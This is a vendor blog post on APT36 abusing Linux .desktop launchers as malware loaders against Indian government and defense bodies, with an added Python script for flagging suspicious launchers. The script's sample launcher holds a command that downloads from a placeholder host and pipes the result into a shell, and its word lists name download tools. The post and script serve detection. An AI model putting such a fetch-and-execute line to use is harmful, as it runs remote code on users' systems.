Shortcuts as Hidden Weapons
Attackers love abusing shortcuts. Not long ago we wrote about malicious LNK files used against Thai officials and how Contextal was able to proactively stop that threat. Windows users know LNKs well as those seemingly harmless desktop icons that can actually execute hidden commands.
Same Trick - Different OS
Now the same playbook shows up on Linux. The threat actor group APT36 has been distributing malicious .desktop files in a campaign targeting Indian government and defense entities. Normally just simple launchers, here they're turned into loaders that pull in and execute malware. Different platform, same trick – abuse what looks like something perfectly legitimate.
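A small triage check for the launcher abuse described above, as an added example that is not from the original post or from Contextal's product: it parses the `[Desktop Entry]` group and flags `Exec` lines that start an inline shell, call a download utility or embed a URL. The word lists, function names and sample entries are assumptions made for illustration.

```python
import re
import shlex

# Heuristic word lists: assumptions for this example, not Contextal's rules.
SHELLS = {"sh", "bash", "dash", "zsh"}
FETCHERS = {"curl", "wget"}

def parse_desktop_entry(text):
    """Return key/value pairs from the [Desktop Entry] group only."""
    entry, in_group = {}, False
    for line in map(str.strip, text.splitlines()):
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
        elif in_group and "=" in line and not line.startswith("#"):
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry

def triage(text):
    """List reasons a launcher deserves a closer look (empty list = none)."""
    entry = parse_desktop_entry(text)
    exec_line = entry.get("Exec", "")
    reasons = []
    try:
        argv = shlex.split(exec_line)
    except ValueError:
        argv = exec_line.split()
        reasons.append("Exec line has unbalanced quoting")
    # Split each argument again so commands nested in `sh -c "..."` are seen.
    words = {w.rsplit("/", 1)[-1] for a in argv for w in re.split(r"[\s|;&()]+", a) if w}
    if argv and argv[0].rsplit("/", 1)[-1] in SHELLS and "-c" in argv:
        reasons.append("Exec runs an inline shell command")
    if words & FETCHERS:
        reasons.append("Exec invokes a download utility")
    if re.search(r"https?://", exec_line):
        reasons.append("Exec embeds a URL")
    if reasons and entry.get("Terminal", "").lower() == "false":
        reasons.append("runs without a visible terminal")
    return reasons

# Constructed samples; example.invalid is a reserved placeholder host.
SUSPICIOUS = '''[Desktop Entry]
Type=Application
Name=Document
Exec=sh -c "curl -s http://example.invalid/a | sh"
Terminal=false
'''
BENIGN = SUSPICIOUS.replace('sh -c "curl -s http://example.invalid/a | sh"', "gedit %U")
```

An empty result only means none of these heuristics matched; `Exec` keys in other groups such as desktop actions are not inspected here.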
Why This Matters in India
It's worth noting that Linux is widely adopted across India's public sector, with government-endorsed distributions like BOSS and Maya OS already deployed in ministries, defense, and education. That makes this attack a very real threat vector in the region.
Contextal’s Proactive Defense
To protect against such threats, Contextal doesn't just scan extensions or file types in isolation. We analyze the full context - where the file came from, what it contains, what it tries to do, and how it connects to an attack chain. That's how we block threats proactively, before they cause damage.
Deploy Contextal Platform or MailPhence today and stay a step ahead.